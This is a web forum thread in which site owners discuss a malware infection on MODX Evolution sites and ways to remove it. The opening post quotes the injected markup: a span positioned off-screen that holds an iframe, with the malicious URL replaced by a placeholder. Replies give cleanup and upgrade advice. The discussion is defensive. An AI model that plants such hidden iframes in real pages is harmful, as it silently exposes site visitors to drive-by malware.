We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 47257
    • 9 Posts
    Hi, one of my client ar having a problem with there MODX Evolution website. It has been infected with some sort of malware. In IE at hidden iframe appears (sometimes not always) at the very top of the page just before the doctype declaration. It can only be viewed in the sourcecode.
    <span style="position:absolute; top:-1018px; width:306px; height:301px;">
    <iframe src="MALWARE-DOMAIN" width="256" height="262"></iframe>
    </span>
    <noscript>


    I have gone through some the javascriptfiles but didn't find anything weird, on the other hand some of the code is hard to read due to charcode etc. Any ideas on where to look for a malware like this in an evolution website or any suggestions to tool who might detect the malware?

    (@gibso80: Modified - removed malware source URL for security reasons) [ed. note: iusemodx last edited this post 10 years, 1 month ago.]
      • 2762
      • 1,198 Posts
      Evo version?

      Check last modified files in your site root

      in the past I had a similar problem with iframe hack, there was some code in .htaccess

        Free MODx Graphic resources and Templates www.tattoocms.it
        -----------------------------------------------------

        MODx IT  www.modx.it
        -----------------------------------------------------

        bubuna.com - Web & Multimedia Design
        • 12322
        • 13 Posts
        I am having the exact same problem. Just discovered it today.
          • 13226
          • 953 Posts
          @ homerjon & gibso80

          Please supply:
          Evo version + a list of ALL snippets used and or not used but are on the server

          Without the information there is probably no chance anyone can offer help
            • 12322
            • 13 Posts
            I am using 1.0.14
            Content
            Ditto (10) - 2.1.1 Summarizes and lists pages to create blogs, catalogs, PR archives, bio listings and more
            DocLister (26) - 2.1.30 Snippet to display the information of the tables by the description rules. The main goal - replacing Ditto and CatalogView
            Jot (7) - 1.1.4 User comments with moderation and email subscription
            phpthumb (24) - 1.2 PHPThumb creates thumbnails and altered images on the fly and caches them
            Reflect (15) - 2.1.1 Generates date-based archives using Ditto
            Forms
            eForm (3) - 1.4.6 Robust form parser/processor with validation, multiple sending options, chunk/page support for forms and reports, and file uploads
            Login
            MemberCheck (13) - 1.1 Show chunks based on a logged in Web User's group membership
            Personalize (8) - 2.1 Personalize snippet
            WebChangePwd (14) - 1.0.1 Allows Web User to change their password from the front-end of the website
            WebLogin (2) - 1.1.1 Allows webusers to login to protected pages in the website, supporting multiple user groups
            WebSignup (12) - 1.1.1 Basic Web User account creation/signup system
            Navigation
            Breadcrumbs (1) - 1.0.5 Configurable breadcrumb page-trail navigation
            FirstChildRedirect (9) - 2.0 Automatically redirects to the first child of a Container Resource
            if (25) - 1.2 A simple conditional snippet. Allows for eq/neq/lt/gt/etc logic within templates, resources, chunks, etc.
            ListIndexer (5) - 1.0.1 A flexible way to show the most recent Resources and other Resource lists
            UltimateParent (11) - 2.0 Travels up the document tree from a specified document and returns its "ultimate" non-root parent
            Wayfinder (4) - 2.0.4 Completely template-driven and highly flexible menu builder
            Search
            AjaxSearch (6) - 1.10.1 Ajax and non-Ajax search that supports results highlighting

            I am not using any snippets that don't come standard out of the box.
              • 13226
              • 953 Posts
              @homerjon

              You are using an outdated version of Evo

              1.0.14 and previous have major security issues that were fixed in 1.0.15 and this year 1.1 was released.

              To note is - you are using "Jot", which has security issues, which as already mentioned, were dealt with in 1.0.15

              So I suggest you update to the latest version ASAP, otherwise your problem will persist

              Blog Posts:

              Backup your server and database, then delete all files on the server and start your update.

              I wouldn't suggest leaving any files on the server and simply overwrite them with the new ones, incase they are not overwritten
                • 29201
                • 239 Posts
                I am seeing the exact same thing with 1.0.15 installed. Has anyone been able to discover the source of this security hole?
                  • 4041
                  • 788 Posts
                  You might check for any plugins that use onwebpageprerender or onwebpagerender events, it could be added that way.
                    xforum
                    http://frsbuilders.net (under construction) forum for evolution
                    • 29201
                    • 239 Posts
                    Thanks breezer. I was able to fix this by upgrading to 1.1. Still unsure of where the security hole is exactly.